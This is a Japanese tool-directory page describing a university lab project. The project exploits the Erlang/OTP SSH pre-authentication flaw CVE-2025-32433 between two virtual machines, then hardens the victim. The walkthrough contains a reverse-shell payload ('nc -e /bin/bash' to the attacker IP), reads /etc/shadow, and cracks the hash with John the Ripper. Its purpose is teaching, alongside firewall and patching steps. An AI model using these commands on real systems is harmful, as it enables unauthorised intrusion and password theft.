Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — このプロジェクトは、2台の仮想マシンにまたがる実際の攻防シナリオをシミュレートします。Erlang/OTP SSHサーバーの認証前の重大なRCE脆弱性(CVE-2025-32433)を悪用し、抽出したパスワードハッシュをクラックした後、ファイアウォールルールとパッチ適用で被害マシンを堅牢化します。 | Kitploit
ツール/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
パスワードクラッキング脆弱性分析エクスプロイトネットワークセキュリティCTFペネトレーションテスト学習と教育ラボと実践
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

このプロジェクトは、2台の仮想マシンにまたがる実際の攻防シナリオをシミュレートします。Erlang/OTP SSHサーバーの認証前の重大なRCE脆弱性(CVE-2025-32433)を悪用し、抽出したパスワードハッシュをクラックした後、ファイアウォールルールとパッチ適用で被害マシンを堅牢化します。

リポジトリを見る
52ヶ月前未レビュー

情報セキュリティ基礎 — 2026年春学期プロジェクト

合計点数: 20 | 提出期限: 遅延提出は受け付けません

概要

このプロジェクトは、2台の仮想マシンにわたる実際の攻撃防御シナリオをシミュレートします。Erlang/OTP SSHサーバーにおける重大な事前認証RCE脆弱性(CVE-2025-32433)を悪用し、抽出したパスワードハッシュをクラックし、その後、ファイアウォールルールとパッチ適用で被害マシンを強化します。

役割OS
攻撃者Kali Linux
被害者Ubuntu/Debian (Erlang/OTP SSH v27.3.2)

ファイル

ファイル説明
Debian-1.ova事前構築済みの被害者VMイメージ — 個別にダウンロードしてください。リソースを参照 (GitHubには大きすぎる)

リソース

  • 被害者VM (Debian-1.ova): ダウンロードリンク — GitHubでホストするには大きすぎる(~3GB)。以下に説明するように個別にダウンロードしてVirtualBox/VMwareにインポートしてください。
  • ワードリスト (rockyou_txt.txt): このリポジトリに含まれており、Part 2のパスワードクラッキングステップで使用します。

セットアップ

  1. VMのインポート — Debian-1.ova と自身のKali Linux VMをVirtualBox/VMwareに読み込みます。
  2. ネットワーク — 両方のVMをホストオンリーアダプターに設定し、プライベートに通信できるようにします。
  3. 被害者IP — 被害者を起動し、ifconfig を実行してIPを確認します(通常は 192.168.56.0/24 内)。

パート1 — 脆弱なSSHサーバーの展開と悪用 (10点)

偵察

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

Document open ports, service versions, and Erlang signatures.

CVE-2025-32433の悪用 (事前認証RCE)

一時的にKaliをNATに切り替えてリポジトリをクローンし、その後ホストオンリーに戻します。

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

Edit the script — set HOST = "<victim-IP>" and update the payload:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

Terminal 1 (Kali) — start listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 (Kali) — launch exploit:

root@kitploit:~
python3 CVE-2025-32433.py

In the reverse shell, run whoami and hostname to confirm access.


パート2 — 事後悪用とパスワードクラッキング (5点)

ハッシュの抽出とクラック

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

ハッシュ形式(例: $6$ = SHA-512)、所要時間、および復元された平文パスワードを記録します。

フラグの検索

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

パート3 — 対策と修復 (5点)

攻撃ベクトルのブロック (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

KaliからNmapスキャンとエクスプロイトを再実行し、ポート2222が"Filtered"になりエクスプロイトが失敗することを記録します。

脆弱性のパッチ適用

CVE-2025-32433の修正を含むErlang/OTPをv27.3.3以降にアップグレードする手順を記録します。


成果物

  • スキャン、エクスプロイト実行、リバースシェル(whoami/hostname)、フラグ取得のスクリーンショットを含む完全なレポート
  • ファイアウォールの前後のドキュメント(ポート状態の変更を示すNmap結果)
  • 事前認証RCEが認証後エクスプロイトよりもはるかに危険である理由を説明する文書による考察

CVE参照

CVE-2025-32433 — Erlang/OTP SSHサーバーにおける重大な事前認証リモートコード実行。認証情報交換前に不正なSSHパケットを送信することで悪用可能であり、認証されていない攻撃者に完全なシェルアクセスを許します。

ツールをダウンロード
Project Spring 2026 - Google Docs.pdf
成果物を含む完全なプロジェクト指示書
rockyou_txt.txtJohn the Ripperで抽出されたパスワードハッシュをクラックするために使用されるワードリスト